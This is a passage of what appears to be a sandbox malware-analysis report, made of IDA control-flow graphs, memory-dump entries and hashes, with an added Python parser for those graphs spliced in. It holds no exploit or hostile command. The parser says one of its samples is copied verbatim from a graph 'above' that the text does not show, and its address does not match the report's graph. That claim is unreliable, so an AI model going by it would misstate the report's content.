                                                              • Instruction Fuzzy Hash: 612151357006188FC768EB68C594BAE37F2EB8E305F240479D406A7369DF719D86EB90
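The `control_flow_graph` and `execution_graph` lines in this report are the IDA plugin's graph serialised as one flat token stream: node records of the form `<id> <hexaddr>[-<hexaddr>] [annotation ...]` and edge records `<src>-><dst>`, with API names (`LdrInitializeThunk`, `KiUserCallbackDispatcher`) and call targets (`call c10c34`, `2 API calls`) hanging off the preceding node. When triaging a report like this one it is useful to turn that stream back into a graph and ask which blocks reach an API call and along which path. The parser below is an added example, not Joe Sandbox code; the grammar it assumes is inferred from the lines on this page, and the two sample graphs are copied verbatim from the `control_flow_graph` line for `5180b20` above and a subset of the `execution_graph` line (node and edge records kept unchanged).

```python
"""Parse flattened Joe Sandbox control_flow_graph / execution_graph lines
into an adjacency list and locate the basic blocks that reach API calls.

Added example, not part of the Joe Sandbox report.  Assumed grammar (from
the report text): after the header word, a node record is a decimal id
followed by a hex address or address range; an edge record is "a->b";
any other token is an annotation of the most recent node.
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{4,}(?:-[0-9a-f]{4,})?$")
# API names as the report spells them (NTDLL dispatchers, Ldr*, Nt*, Rtl*).
API_RE = re.compile(r"^(?:Ki|Ldr|Nt|Zw|Rtl)[A-Za-z]+$")

# Sample 1: the control_flow_graph line for 5180b20 from this report.
CFG_5180B20 = (
    "control_flow_graph 589 5180b20-5180b75 LdrInitializeThunk "
    "593 5180b7c-5180b83 589->593 594 5180bcb-5180be4 593->594 "
    "595 5180b85-5180bb9 593->595 598 5180bef 594->598 599 5180be6 "
    "594->599 595->594 604 5180bbb-5180bc5 595->604 600 5180bf0 "
    "598->600 599->598 600->600 604->594"
)

# Sample 2: a subset of the execution_graph line (records unchanged).
EXEC_GRAPH_SNIPPET = (
    "execution_graph 23235 c10888 23236 c108a3 23235->23236 "
    "23241 c175e6 23236->23241 23255 c17598 23236->23255 23237 c10902 "
    "23242 c175f1 23241->23242 23247 c17602 23242->23247 23288 c17e85 "
    "23242->23288 23247->23237 23256 c175b7 23255->23256 23257 c17602 "
    "23256->23257 23261 c17e85 2 API calls 23256->23261 23257->23237 "
    "23261->23257 23289 c17e8a 23288->23289 23290 c17f8b 23289->23290 "
    "23291 5180a6a KiUserExceptionDispatcher 23289->23291 23290->23247 "
    "23291->23290"
)


def parse_graph(line):
    """Return (nodes, edges).  nodes: id -> {start, end, notes};
    edges: list of (src, dst) id pairs in the order they appear."""
    tokens = line.split()
    if tokens and tokens[0] in ("control_flow_graph", "execution_graph"):
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A node record is a decimal id immediately followed by an address;
        # a bare number inside an annotation ("2 API calls") is not.
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")
            current = int(tok)
            nodes[current] = {"start": int(start, 16),
                              "end": int(end or start, 16),
                              "notes": []}
            i += 2
            continue
        if current is not None:           # annotation of the last node
            nodes[current]["notes"].append(tok)
        i += 1
    return nodes, edges


def api_call_sites(nodes):
    """Map each API name seen in annotations to the sorted node ids carrying it."""
    sites = defaultdict(list)
    for nid, node in nodes.items():
        for note in node["notes"]:
            if API_RE.match(note):
                sites[note].append(nid)
    return {api: sorted(ids) for api, ids in sites.items()}


def _adjacency(edges):
    adj = defaultdict(list)
    for src, dst in edges:
        adj[src].append(dst)
    return adj


def reachable(edges, entry):
    """Set of node ids reachable from `entry` (entry included)."""
    adj, seen, todo = _adjacency(edges), {entry}, deque([entry])
    while todo:
        for dst in adj[todo.popleft()]:
            if dst not in seen:
                seen.add(dst)
                todo.append(dst)
    return seen


def path_to_api(nodes, edges, entry, api):
    """Shortest path (list of ids) from `entry` to the first block
    annotated with `api`, or None if no such block is reachable."""
    adj, parent, todo = _adjacency(edges), {entry: None}, deque([entry])
    while todo:
        n = todo.popleft()
        if api in nodes.get(n, {}).get("notes", []):
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for dst in adj[n]:
            if dst not in parent:
                parent[dst] = n
                todo.append(dst)
    return None


if __name__ == "__main__":
    nodes, edges = parse_graph(EXEC_GRAPH_SNIPPET)
    for api, ids in api_call_sites(nodes).items():
        print(api, [hex(nodes[i]["start"]) for i in ids])
    print(path_to_api(nodes, edges, 23235, "KiUserExceptionDispatcher"))
```

Two caveats when applying this to a full report: the hex-address test is what separates a node id from a number inside an annotation, so an annotation word that happens to be pure hex (four or more of `0-9a-f`) directly after a number would be misread as a node, and the execution graph's `N API calls` annotations summarise calls made below that node rather than naming them, so `api_call_sites` only reports blocks where the report spells the API out.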

                                                              Control-flow Graph

                                                              control_flow_graph 606 c15ac0-c15b26 608 c15b70-c15b72 606->608 609 c15b28-c15b33 606->609 611 c15b74-c15b8d 608->611 609->608 610 c15b35-c15b41 609->610 612 c15b43-c15b4d 610->612 613 c15b64-c15b6e 610->613 618 c15bd9-c15bdb 611->618 619 c15b8f-c15b9b 611->619 614 c15b51-c15b60 612->614 615 c15b4f 612->615 613->611 614->614 617 c15b62 614->617 615->614 617->613 621 c15bdd-c15c35 618->621 619->618 620 c15b9d-c15ba9 619->620 622 c15bab-c15bb5 620->622 623 c15bcc-c15bd7 620->623 630 c15c37-c15c42 621->630 631 c15c7f-c15c81 621->631 624 c15bb7 622->624 625 c15bb9-c15bc8 622->625 623->621 624->625 625->625 627 c15bca 625->627 627->623 630->631 633 c15c44-c15c50 630->633 632 c15c83-c15c9b 631->632 640 c15ce5-c15ce7 632->640 641 c15c9d-c15ca8 632->641 634 c15c73-c15c7d 633->634 635 c15c52-c15c5c 633->635 634->632 636 c15c60-c15c6f 635->636 637 c15c5e 635->637 636->636 639 c15c71 636->639 637->636 639->634 642 c15ce9-c15d3a 640->642 641->640 643 c15caa-c15cb6 641->643 651 c15d40-c15d4e 642->651 644 c15cd9-c15ce3 643->644 645 c15cb8-c15cc2 643->645 644->642 647 c15cc4 645->647 648 c15cc6-c15cd5 645->648 647->648 648->648 649 c15cd7 648->649 649->644 652 c15d50-c15d56 651->652 653 c15d57-c15db7 651->653 652->653 660 c15dc7-c15dcb 653->660 661 c15db9-c15dbd 653->661 663 c15ddb-c15ddf 660->663 664 c15dcd-c15dd1 660->664 661->660 662 c15dbf 661->662 662->660 666 c15de1-c15de5 663->666 667 c15def-c15df3 663->667 664->663 665 c15dd3 664->665 665->663 666->667 670 c15de7-c15dea call c10c34 666->670 668 c15e03-c15e07 667->668 669 c15df5-c15df9 667->669 672 c15e17-c15e1b 668->672 673 c15e09-c15e0d 668->673 669->668 671 c15dfb-c15dfe call c10c34 669->671 670->667 671->668 677 c15e2b-c15e2f 672->677 678 c15e1d-c15e21 672->678 673->672 676 c15e0f-c15e12 call c10c34 673->676 676->672 681 c15e31-c15e35 677->681 682 c15e3f 677->682 678->677 680 c15e23 678->680 680->677 681->682 683 c15e37 681->683 684 c15e40 682->684 683->682 
684->684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m
                                                              • API String ID: 0-3751104571
                                                              • Opcode ID: f033a683366ee7ed4f870a5ed4ba7d100224771e1f6a37c34f1cc98f7bbd008d
                                                              • Instruction ID: 20c4e37dc59aa4b2c7268fba0fe4f3701b68d57740fd88562050f6dbbb15672c
                                                              • Opcode Fuzzy Hash: f033a683366ee7ed4f870a5ed4ba7d100224771e1f6a37c34f1cc98f7bbd008d
                                                              • Instruction Fuzzy Hash: 14B17E70E00709CFDB10DFA9D9957DDBBF2AF89304F248129D425AB294EB749982DF81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9955e1b324b8c8bef009e53800ed2f6a8096af95b4486e5b1ff98065870c2c2d
                                                              • Instruction ID: 76db88593a95fa15d3ffd560d76adc28c0d7044fc124591eb16f65680d414f62
                                                              • Opcode Fuzzy Hash: 9955e1b324b8c8bef009e53800ed2f6a8096af95b4486e5b1ff98065870c2c2d
                                                              • Instruction Fuzzy Hash: FBB14C70E00209DFDF10CFA9D8817EDBBF2AF89354F148129E815AB394EB749985DB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 853fe1dc11b4753e5b918bbea75455d7fcae46e61fb4e62e727933b1bcd9668d
                                                              • Instruction ID: 11a7789814f8230538ecfbe73093d75278d31f038db2d01ea014610ee31f662b
                                                              • Opcode Fuzzy Hash: 853fe1dc11b4753e5b918bbea75455d7fcae46e61fb4e62e727933b1bcd9668d
                                                              • Instruction Fuzzy Hash: 85D15EB142A7058BD720DF68E84E2997FB1FB85324F524609F1656F2E4EFB4144ACF84

                                                              Control-flow Graph

                                                              control_flow_graph 48 c11760-c1177f 49 c11785-c117f7 call c10af8 48->49 50 c11a2a-c11a65 48->50 77 c117fd-c11874 49->77 60 c11a67-c11a8b 50->60 61 c11a09-c11a20 50->61 64 c11ab6-c11abf 60->64 65 c11ac1-c11ac7 64->65 66 c11a8d-c11a96 64->66 68 c11a98-c11aa6 66->68 69 c11aca-c11bad call c10b34 66->69 68->69 70 c11aa8-c11aac 68->70 115 c11baf call c11bd0 69->115 116 c11baf call c11be0 69->116 71 c11ab3 70->71 72 c11aae-c11ab0 70->72 71->64 72->71 96 c11876-c11889 77->96 97 c1188b-c118af 77->97 98 c118b6-c118ba 96->98 97->98 101 c118c5-c118c6 98->101 102 c118bc 98->102 101->61 102->101 113 c11bb5-c11bcd 115->113 116->113
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (q$Teq$dOt
                                                              • API String ID: 0-1630157752
                                                              • Opcode ID: d26438dc5002ad86c80ed2db3c9e53c97f48853112d21a200d4aaad7c02bf953
                                                              • Instruction ID: 38120b0f60f9bb876b7d5d82e4b615f32424c29d73cce8abfddee1261cd80335
                                                              • Opcode Fuzzy Hash: d26438dc5002ad86c80ed2db3c9e53c97f48853112d21a200d4aaad7c02bf953
                                                              • Instruction Fuzzy Hash: F591B031B002149FDB04DF79C455BAEBBF6EF89710F2481A9E906DB3A1DA74DD428B90

                                                              Control-flow Graph

                                                              control_flow_graph 117 5185311-5185318 118 5185388 117->118 119 518531a-518537f 117->119 121 5185389-51853b7 KiUserCallbackDispatcher 118->121 119->118 122 51853b9-51853bf 121->122 123 51853c0-51853e6 121->123 122->123
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 051853A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: 4'q
                                                              • API String ID: 2492992576-1807707664
                                                              • Opcode ID: bd2542951e1d7aac4644642a7ca54a90b07a6dd951ec6f1c6e10a3dbca3baf0b
                                                              • Instruction ID: 6c0bedb81226f9760879aef9fc423fe3713ef566ec8db13c46bd1d54446d6b7a
                                                              • Opcode Fuzzy Hash: bd2542951e1d7aac4644642a7ca54a90b07a6dd951ec6f1c6e10a3dbca3baf0b
                                                              • Instruction Fuzzy Hash: 152198B1D043598FCB24DFA9D841BEEBBB4FB08320F14811AE815B7280C778A945CFA5

                                                              Control-flow Graph

                                                              control_flow_graph 129 5185320-51853b7 KiUserCallbackDispatcher 135 51853b9-51853bf 129->135 136 51853c0-51853e6 129->136 135->136
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 051853A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: 4'q
                                                              • API String ID: 2492992576-1807707664
                                                              • Opcode ID: bf67d0e504a3a2e9e1d9df9cb05b17d14d1f35a98c00da6ec6355d3156a0d7a9
                                                              • Instruction ID: 3fca8f296c61ce5f7826f4daa0c1efa1c5526e5366a974b18e5aadeb306fa67f
                                                              • Opcode Fuzzy Hash: bf67d0e504a3a2e9e1d9df9cb05b17d14d1f35a98c00da6ec6355d3156a0d7a9
                                                              • Instruction Fuzzy Hash: 992137B1D043598FCB20DF99D545BEEBBB4FB08320F14811AE819B7240C7746945CFA5

                                                              Control-flow Graph

                                                              control_flow_graph 139 c16da0-c16db6 140 c16ef4-c16f19 139->140 141 c16dbc-c16dbe 139->141 142 c16f20-c16f6b 140->142 141->142 143 c16dc4-c16dd2 141->143 164 c16fcd-c16fd2 142->164 165 c16f6d-c16f76 142->165 148 c16e05-c16e13 143->148 149 c16dd4-c16ddc 143->149 156 c16e15-c16e1d 148->156 157 c16e5a-c16e68 148->157 151 c16dea-c16e02 149->151 152 c16dde-c16de0 149->152 152->151 159 c16e2b-c16e57 156->159 160 c16e1f-c16e21 156->160 166 c16e6a-c16e72 157->166 167 c16eaf-c16eb7 157->167 160->159 169 c16fc3-c16fc7 165->169 170 c16f78-c16f7b 165->170 173 c16e80-c16eac 166->173 174 c16e74-c16e76 166->174 171 c16ec5-c16ef1 167->171 172 c16eb9-c16ebb 167->172 169->164 176 c16fd3-c1701d 170->176 177 c16f7d-c16f8a 170->177 172->171 174->173 178 c16f9a-c16fa2 177->178 179 c16f8c-c16f98 177->179 185 c16fa7-c16fb7 178->185 179->178 190 c16fb8-c16fc1 179->190 190->169 190->170
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (q$(q
                                                              • API String ID: 0-2485164810
                                                              • Opcode ID: 900054cd2a90eed345e53432dcc1424aad73062eec49e657dd86588fa7847c9a
                                                              • Instruction ID: 1d22e3a624b0883ae42040b3829dc74f91d6e8fdb204336cc4892277ef02f296
                                                              • Opcode Fuzzy Hash: 900054cd2a90eed345e53432dcc1424aad73062eec49e657dd86588fa7847c9a
                                                              • Instruction Fuzzy Hash: 8471C1317043404FDB19DF69E890A9EBBE6AFC625031485BEE805CB396DA70ED46C7A1

                                                              Control-flow Graph

                                                              control_flow_graph 246 c160fc-c16194 249 c16196-c161a1 246->249 250 c161de-c161e0 246->250 249->250 252 c161a3-c161af 249->252 251 c161e2-c161fa 250->251 259 c16244-c16246 251->259 260 c161fc-c16207 251->260 253 c161b1-c161bb 252->253 254 c161d2-c161dc 252->254 255 c161bd 253->255 256 c161bf-c161ce 253->256 254->251 255->256 256->256 258 c161d0 256->258 258->254 261 c16248-c1625a 259->261 260->259 262 c16209-c16215 260->262 269 c16261-c1628d 261->269 263 c16217-c16221 262->263 264 c16238-c16242 262->264 266 c16223 263->266 267 c16225-c16234 263->267 264->261 266->267 267->267 268 c16236 267->268 268->264 270 c16293-c162a1 269->270 271 c162a3-c162a9 270->271 272 c162aa-c16307 270->272 271->272 279 c16317-c1631b 272->279 280 c16309-c1630d 272->280 282 c1632b-c1632f 279->282 283 c1631d-c16321 279->283 280->279 281 c1630f-c16312 call c10c34 280->281 281->279 286 c16331-c16335 282->286 287 c1633f-c16343 282->287 283->282 285 c16323-c16326 call c10c34 283->285 285->282 286->287 289 c16337 286->289 290 c16353 287->290 291 c16345-c16349 287->291 289->287 293 c16354 290->293 291->290 292 c1634b 291->292 292->290 293->293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m$\V^m
                                                              • API String ID: 0-3963016192
                                                              • Opcode ID: 4d76b5ecb0b1d5a01203ba5ca8a3573421dfe88caf71fb789aad86b44060a32d
                                                              • Instruction ID: 59c96088a6cc96fbbd50bdb9188e79d92650b6801ccee797eee5df695828467f
                                                              • Opcode Fuzzy Hash: 4d76b5ecb0b1d5a01203ba5ca8a3573421dfe88caf71fb789aad86b44060a32d
                                                              • Instruction Fuzzy Hash: A7715CB0E00209DFDF14CFA9C8857DEBBF1AF89314F148129E465AB254DB749982DB91

                                                              Control-flow Graph

                                                              control_flow_graph 294 c16108-c16194 297 c16196-c161a1 294->297 298 c161de-c161e0 294->298 297->298 300 c161a3-c161af 297->300 299 c161e2-c161fa 298->299 307 c16244-c16246 299->307 308 c161fc-c16207 299->308 301 c161b1-c161bb 300->301 302 c161d2-c161dc 300->302 303 c161bd 301->303 304 c161bf-c161ce 301->304 302->299 303->304 304->304 306 c161d0 304->306 306->302 309 c16248-c1628d 307->309 308->307 310 c16209-c16215 308->310 318 c16293-c162a1 309->318 311 c16217-c16221 310->311 312 c16238-c16242 310->312 314 c16223 311->314 315 c16225-c16234 311->315 312->309 314->315 315->315 316 c16236 315->316 316->312 319 c162a3-c162a9 318->319 320 c162aa-c16307 318->320 319->320 327 c16317-c1631b 320->327 328 c16309-c1630d 320->328 330 c1632b-c1632f 327->330 331 c1631d-c16321 327->331 328->327 329 c1630f-c16312 call c10c34 328->329 329->327 334 c16331-c16335 330->334 335 c1633f-c16343 330->335 331->330 333 c16323-c16326 call c10c34 331->333 333->330 334->335 337 c16337 334->337 338 c16353 335->338 339 c16345-c16349 335->339 337->335 341 c16354 338->341 339->338 340 c1634b 339->340 340->338 341->341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V^m$\V^m
                                                              • API String ID: 0-3963016192
                                                              • Opcode ID: 4438f8b88b349e976ecfda3b09e1e23b5c081a4b8302b6f9b4d7a6cc77e05bc1
                                                              • Instruction ID: 95d5cc9e2c30758760f499b713daeb81daf0f755aa76fde2bffc98cb2857cb8a
                                                              • Opcode Fuzzy Hash: 4438f8b88b349e976ecfda3b09e1e23b5c081a4b8302b6f9b4d7a6cc77e05bc1
                                                              • Instruction Fuzzy Hash: C7714EB0E00209DFDF14DFA9C8857DEBBF2BF89314F148129D425AB254EB749982DB91

                                                              Control-flow Graph

                                                              control_flow_graph 342 c11750-c1175d 343 c11701-c11715 342->343 344 c1175f-c1177f 342->344 347 c11717-c11732 343->347 348 c116b9 343->348 345 c11785-c117f7 call c10af8 344->345 346 c11a2a-c11a65 344->346 387 c117fd-c11874 345->387 368 c11a67-c11a8b 346->368 369 c11a09-c11a20 346->369 425 c11734 call c11750 347->425 426 c11734 call c11760 347->426 349 c116c4-c11715 348->349 350 c116bb 348->350 349->347 349->348 350->349 362 c1173a-c1174a 372 c11ab6-c11abf 368->372 374 c11ac1-c11ac7 372->374 375 c11a8d-c11a96 372->375 377 c11a98-c11aa6 375->377 378 c11aca-c11bad call c10b34 375->378 377->378 379 c11aa8-c11aac 377->379 427 c11baf call c11bd0 378->427 428 c11baf call c11be0 378->428 381 c11ab3 379->381 382 c11aae-c11ab0 379->382 381->372 382->381 406 c11876-c11889 387->406 407 c1188b-c118af 387->407 408 c118b6-c118ba 406->408 407->408 411 c118c5-c118c6 408->411 412 c118bc 408->412 411->369 412->411 423 c11bb5-c11bcd 425->362 426->362 427->423 428->423
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teq$dOt
                                                              • API String ID: 0-2859403557
                                                              • Opcode ID: b7eab75bfbaf8fc17cdbdb7ccef315b326d0af75701dfc9c7e649e79e7ecfe85
                                                              • Instruction ID: 144524e11b321b98f892429b0533f6b5c44dfc9baa4e26c666170e49ff54147d
                                                              • Opcode Fuzzy Hash: b7eab75bfbaf8fc17cdbdb7ccef315b326d0af75701dfc9c7e649e79e7ecfe85
                                                              • Instruction Fuzzy Hash: E0518235B102109FCB08DF39D459A9EBBF6EF89710B1581A9E806DB7B2CA75DC05CB90

                                                              Control-flow Graph

                                                              control_flow_graph 429 c1cb98-c1cbb9 430 c1cbc7-c1cbcb 429->430 431 c1cbbb-c1cbbf 429->431 432 c1cbd1-c1cbd4 430->432 433 c1d22a 430->433 431->433 434 c1cbc5 431->434 435 c1cbda-c1cbe2 432->435 436 c1d22f-c1d234 432->436 433->436 434->432 437 c1cbf2-c1cc0e call c1cab8 435->437 438 c1cbe4-c1cbe7 435->438 444 c1d239-c1d240 436->444 447 c1cc10-c1cc26 call c1cab8 437->447 448 c1cc8b-c1ccb7 call c1cab8 437->448 441 c1cbed 438->441 442 c1ccbc-c1cce0 call c1cab8 438->442 441->444 449 c1cce2-c1ccfb 442->449 450 c1ccfd-c1cd0b 442->450 458 c1cc58-c1cc7d call c1cab8 447->458 459 c1cc28-c1cc2c 447->459 448->444 461 c1cd35-c1cd47 449->461 450->433 453 c1cd11-c1cd13 450->453 453->433 457 c1cd19-c1cd1b 453->457 457->433 462 c1cd21-c1cd2d 457->462 480 c1cc85-c1cc89 458->480 459->458 463 c1cc2e-c1cc4e call c1cab8 459->463 467 c1cd59-c1cd76 call c1cab8 461->467 468 c1cd49 461->468 462->461 481 c1cc56 463->481 476 c1cd78-c1cd7c 467->476 477 c1cd7e-c1cd8d 467->477 468->444 472 c1cd4f-c1cd53 468->472 472->444 472->467 476->477 479 c1cd90-c1ce22 476->479 477->479 489 c1ce25-c1ce4d 479->489 480->447 480->448 481->480 489->436 492 c1ce53-c1ce71 489->492 493 c1ce73 492->493 494 c1ce7a-c1ce83 492->494 495 c1ced5-c1cee6 493->495 496 c1ce75-c1ce78 493->496 497 c1ce85-c1ceab 494->497 498 c1cead-c1ced3 494->498 499 c1cef4-c1cef8 495->499 500 c1cee8-c1ceec 495->500 496->494 496->495 505 c1cf16-c1cf1f 497->505 498->505 499->433 503 c1cefe-c1cf01 499->503 500->433 502 c1cef2 500->502 502->503 503->436 506 c1cf07-c1cf0f 503->506 505->436 507 c1cf25-c1cf3a 505->507 506->505 507->489 508 c1cf40-c1cf44 507->508 509 c1cf46-c1cf4a 508->509 510 c1cf4c-c1cf50 508->510 509->510 511 c1cf60-c1cf64 509->511 512 c1d087-c1d093 510->512 513 c1cf56-c1cf5a 510->513 514 c1cfc5-c1cfc9 511->514 515 c1cf66-c1cf6a 511->515 512->436 516 c1d099-c1d0aa 512->516 513->511 513->512 519 c1d027-c1d02b 514->519 520 c1cfcb-c1cfcf 514->520 515->514 517 c1cf6c-c1cf78 
515->517 516->436 518 c1d0b0-c1d0b7 516->518 517->436 521 c1cf7e-c1cf99 517->521 518->436 522 c1d0bd-c1d0c4 518->522 519->512 523 c1d02d-c1d031 519->523 520->519 524 c1cfd1-c1cfdd 520->524 521->436 532 c1cf9f-c1cfa7 521->532 522->436 525 c1d0ca-c1d0d1 522->525 523->512 526 c1d033-c1d03f 523->526 524->436 527 c1cfe3-c1cffe 524->527 525->436 529 c1d0d7-c1d0ea call c1cab8 525->529 526->436 530 c1d045-c1d060 526->530 527->436 534 c1d004-c1d00c 527->534 539 c1d14a-c1d14e 529->539 540 c1d0ec-c1d0f0 529->540 530->436 541 c1d066-c1d06e 530->541 532->436 535 c1cfad-c1cfc0 532->535 534->436 538 c1d012-c1d025 534->538 535->512 538->512 542 c1d150-c1d154 539->542 543 c1d1ab-c1d1af 539->543 540->539 545 c1d0f2-c1d0fe 540->545 541->436 546 c1d074-c1d07f 541->546 542->543 550 c1d156-c1d162 542->550 547 c1d1b1-c1d1b5 543->547 548 c1d202-c1d217 543->548 545->436 551 c1d104-c1d12c 545->551 546->512 547->548 553 c1d1b7-c1d1c3 547->553 555 c1d219 548->555 556 c1d228 548->556 550->436 554 c1d168-c1d190 550->554 551->436 563 c1d132-c1d145 551->563 553->436 558 c1d1c5-c1d1ed 553->558 554->436 565 c1d196-c1d1a9 554->565 555->467 560 c1d21f-c1d222 555->560 556->444 558->436 567 c1d1ef-c1d1fa 558->567 560->467 560->556 563->548 565->548 567->548
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3833775078.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_c10000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: a37b65af347b43d407cf43ea5cdb7c4ba75cf74b97ab8f5e2fa9d3b1bc373877
                                                              • Instruction ID: e9b40fa9013781e10dd0d62fa45a172d4b432d71ea1746592396fc92d3ab9f72
                                                              • Opcode Fuzzy Hash: a37b65af347b43d407cf43ea5cdb7c4ba75cf74b97ab8f5e2fa9d3b1bc373877
                                                              • Instruction Fuzzy Hash: 08324671A00609DFDB24CF69C884B9DFBB2FF99304F248629E4269B615D730ED95DB80

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 572 5180b1f-5180b5b 575 5180b62-5180b75 LdrInitializeThunk 572->575 576 5180b7c-5180b83 575->576 577 5180bcb-5180be4 576->577 578 5180b85-5180bb9 576->578 581 5180bef 577->581 582 5180be6 577->582 578->577 587 5180bbb-5180bc5 578->587 583 5180bf0 581->583 582->581 583->583 587->577
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3837220203.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5180000_vYz1Z2heor.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fcf81e3c3b3df1e741a21fd9e69213380db800cf65c146e463418f9b841d52f5
                                                              • Instruction ID: 3cbd8c73150cfd6b275576bf862014450914d46162377f21b52c7250c15de1c4
                                                              • Opcode Fuzzy Hash: fcf81e3c3b3df1e741a21fd9e69213380db800cf65c146e463418f9b841d52f5
                                                              • Instruction Fuzzy Hash: 84214F357006188FC768EB68C594BAE37F2AB8E305F240479D406A7369DB719D86EB90

                                                              control_flow_graph 685 c15ab4-c15b26 687 c15b70-c15b72 685->687 688 c15b28-c15b33 685->688 690 c15b74-c15b8d 687->690 688->687 689 c15b35-c15b41 688->689 691 c15b43-c15b4d 689->691 692 c15b64-c15b6e 689->692 697 c15bd9-c15bdb 690->697 698 c15b8f-c15b9b 690->698 693 c15b51-c15b60 691->693 694 c15b4f 691->694 692->690 693->693 696 c15b62 693->696 694->693 696->692 700 c15bdd-c15c35 697->700 698->697 699 c15b9d-c15ba9 698->699 701 c15bab-c15bb5 699->701 702 c15bcc-c15bd7 699->702 709 c15c37-c15c42 700->709 710 c15c7f-c15c81 700->710 703 c15bb7 701->703 704 c15bb9-c15bc8 701->704 702->700 703->704 704->704 706 c15bca 704->706 706->702 709->710 712 c15c44-c15c50 709->712 711 c15c83-c15c9b 710->711 719 c15ce5-c15ce7 711->719 720 c15c9d-c15ca8 711->720 713 c15c73-c15c7d 712->713 714 c15c52-c15c5c 712->714 713->711 715 c15c60-c15c6f 714->715 716 c15c5e 714->716 715->715 718 c15c71 715->718 716->715 718->713 721 c15ce9-c15cfb 719->721 720->719 722 c15caa-c15cb6 720->722 729 c15d02-c15d3a 721->729 723 c15cd9-c15ce3 722->723 724 c15cb8-c15cc2 722->724 723->721 726 c15cc4 724->726 727 c15cc6-c15cd5 724->727 726->727 727->727 728 c15cd7 727->728 728->723 730 c15d40-c15d4e 729->730 731 c15d50-c15d56 730->731 732 c15d57-c15db7 730->732 731->732 739 c15dc7-c15dcb 732->739 740 